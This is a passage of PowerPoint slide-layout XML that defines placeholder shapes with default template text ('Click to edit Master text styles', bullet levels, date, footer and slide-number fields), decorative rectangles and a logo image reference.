          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767880" y="2836800"/>
            <a:ext cx="3031560" cy="3000960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6456960"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6452640"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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105" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6456960"/>
            <a:ext cx="105228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fld id="{98109AF7-E35C-49D9-9AF8-A0632BD4B98C}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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108" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="4693320"/>
            <a:ext cx="11029320" cy="566280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="641520"/>
            <a:ext cx="11290320" cy="3650760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="5259960"/>
            <a:ext cx="11029320" cy="997920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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115" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{0E19551E-BEC9-469F-92D3-0A787288727F}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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14" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="702000"/>
            <a:ext cx="11029320" cy="1013400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1415160"/>
            <a:ext cx="11029320" cy="4572360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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20" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{1077C37A-F2A4-4253-8545-53C5D075F112}" type="slidenum">
